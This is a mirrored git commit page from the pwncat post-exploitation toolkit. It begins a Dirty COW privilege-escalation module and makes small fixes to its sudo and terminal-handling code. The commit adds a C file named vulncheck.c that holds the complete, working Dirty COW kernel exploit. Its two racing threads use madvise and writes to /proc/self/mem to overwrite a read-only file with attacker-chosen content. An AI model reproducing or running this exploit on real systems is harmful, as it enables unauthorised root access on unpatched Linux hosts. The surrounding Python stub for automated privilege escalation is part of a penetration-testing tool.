mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-24 01:25:37 +01:00
Started the process for dirtcow
This commit is contained in:
John Hammond
parent
72ba1b093b
commit
7a3c4f3bb4
9
data/dirtycow/vulncheck.c
Normal file
9
data/dirtycow/vulncheck.c
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
#include<stdio.h>
|
||||||
|
#include<sys/mman.h>
|
||||||
|
#include<fcntl.h>
|
||||||
|
#include<pthread.h>
|
||||||
|
#include<unistd.h>
|
||||||
|
#include<sys/stat.h>
|
||||||
|
#include<string.h>
|
||||||
|
#include<stdint.h>
|
||||||
|
void*map;int f;struct stat st;char*name;void*madviseThread(void*arg){char*str;str=(char*)arg;int i,c=0;for(i=0;i<100000000;i++){c+=madvise(map,100,MADV_DONTNEED);}printf("madvise%d\n\n",c);}void*procselfmemThread(void*arg){char*str;str=(char*)arg;int f=open("/proc/self/mem",O_RDWR);int i,c=0;for(i=0;i<100000000;i++){lseek(f,(uintptr_t)map,SEEK_SET);c+=write(f,str,strlen(str));}printf("procselfmem%d\n\n",c);}int main(int argc,char*argv[]){if(argc<3){(void)fprintf(stderr,"%s\n","usage: dirtyc0w target_file new_content");return 1;}pthread_t pth1,pth2;f=open(argv[1],O_RDONLY);fstat(f,&st);name=argv[1];map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);printf("mmap%zx\n\n",(uintptr_t)map);pthread_create(&pth1,NULL,madviseThread,argv[1]);pthread_create(&pth2,NULL,procselfmemThread,argv[2]);pthread_join(pth1,NULL);pthread_join(pth2,NULL);return 0;}
|
||||||
43
pwncat/privesc/dirtycow.py
Normal file
43
pwncat/privesc/dirtycow.py
Normal file
@ -0,0 +1,43 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
from typing import Generator, List
|
||||||
|
import shlex
|
||||||
|
import sys
|
||||||
|
from time import sleep
|
||||||
|
import os
|
||||||
|
from colorama import Fore, Style
|
||||||
|
import socket
|
||||||
|
from io import StringIO, BytesIO
|
||||||
|
import functools
|
||||||
|
|
||||||
|
from pwncat.util import CTRL_C
|
||||||
|
from pwncat.privesc.base import Method, PrivescError, Technique
|
||||||
|
from pwncat.file import RemoteBinaryPipe
|
||||||
|
|
||||||
|
from pwncat.pysudoers import Sudoers
|
||||||
|
from pwncat import gtfobins
|
||||||
|
from pwncat.privesc import Capability
|
||||||
|
from pwncat import util
|
||||||
|
|
||||||
|
|
||||||
|
class DirtycowMethod(Method):
|
||||||
|
|
||||||
|
name = "dirtycow"
|
||||||
|
BINARIES = ["gcc"]
|
||||||
|
|
||||||
|
def __init__(self, pty: "pwncat.pty.PtyHandler"):
|
||||||
|
super(DirtycowMethod, self).__init__(pty)
|
||||||
|
|
||||||
|
def enumerate(self, capability: int = Capability.ALL) -> List[Technique]:
|
||||||
|
""" Find all techniques known at this time """
|
||||||
|
|
||||||
|
# Test if this kernel version is vulnerable to dirtycow
|
||||||
|
|
||||||
|
return NotImplemented("this function is not yet written")
|
||||||
|
|
||||||
|
def execute(self, technique: Technique):
|
||||||
|
""" Run the specified technique """
|
||||||
|
|
||||||
|
# actually perform dirtycow
|
||||||
|
|
||||||
|
return NotImplemented("this function is not yet written")
|
||||||
@ -138,14 +138,6 @@ class SudoMethod(Method):
|
|||||||
tag = " ".join(tags_split[1:])
|
tag = " ".join(tags_split[1:])
|
||||||
command = commands["command"]
|
command = commands["command"]
|
||||||
|
|
||||||
# success(
|
|
||||||
# f"user {Fore.GREEN}{current_user['name']}{Fore.RESET} can run "
|
|
||||||
# + f"{Fore.YELLOW}{command}{Fore.RESET} "
|
|
||||||
# + f"as user {Fore.BLUE}{run_as_user}{Fore.RESET} "
|
|
||||||
# + f"with {Fore.BLUE}{tag}{Fore.RESET}",
|
|
||||||
# overlay=True,
|
|
||||||
# )
|
|
||||||
|
|
||||||
if "NOPASSWD" in tag:
|
if "NOPASSWD" in tag:
|
||||||
sudo_no_password.append(
|
sudo_no_password.append(
|
||||||
{
|
{
|
||||||
@ -181,9 +173,7 @@ class SudoMethod(Method):
|
|||||||
# The PtyHandler.which method is used to verify the presence of
|
# The PtyHandler.which method is used to verify the presence of
|
||||||
# different GTFObins on the remote system when an "ALL" spec is
|
# different GTFObins on the remote system when an "ALL" spec is
|
||||||
# found.
|
# found.
|
||||||
# sudo_privesc["command"], binary = gtfobins.Binary.find_sudo(
|
|
||||||
# sudo_privesc["command"], self.pty.which
|
|
||||||
# )
|
|
||||||
binaries = gtfobins.Binary.find_sudo(
|
binaries = gtfobins.Binary.find_sudo(
|
||||||
sudo_privesc["command"], self.pty.which, capability
|
sudo_privesc["command"], self.pty.which, capability
|
||||||
)
|
)
|
||||||
|
|||||||
@ -791,7 +791,6 @@ class PtyHandler:
|
|||||||
""" Reset the remote terminal (calls sync, reset, and sets PS1) """
|
""" Reset the remote terminal (calls sync, reset, and sets PS1) """
|
||||||
self.reset()
|
self.reset()
|
||||||
self.do_sync([])
|
self.do_sync([])
|
||||||
print(self.id())
|
|
||||||
|
|
||||||
def run(self, cmd, wait=True, input: bytes = b"") -> bytes:
|
def run(self, cmd, wait=True, input: bytes = b"") -> bytes:
|
||||||
""" Run a command in the context of the remote host and return the
|
""" Run a command in the context of the remote host and return the
|
||||||
@ -985,9 +984,9 @@ class PtyHandler:
|
|||||||
@property
|
@property
|
||||||
def id(self):
|
def id(self):
|
||||||
|
|
||||||
id_output = self.run("id")
|
id_output = self.run("id").decode("utf-8")
|
||||||
|
|
||||||
pieces = id_output.split(" ").decode("utf-8")
|
pieces = id_output.split(" ")
|
||||||
props = {}
|
props = {}
|
||||||
for p in pieces:
|
for p in pieces:
|
||||||
segments = p.split("=")
|
segments = p.split("=")
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user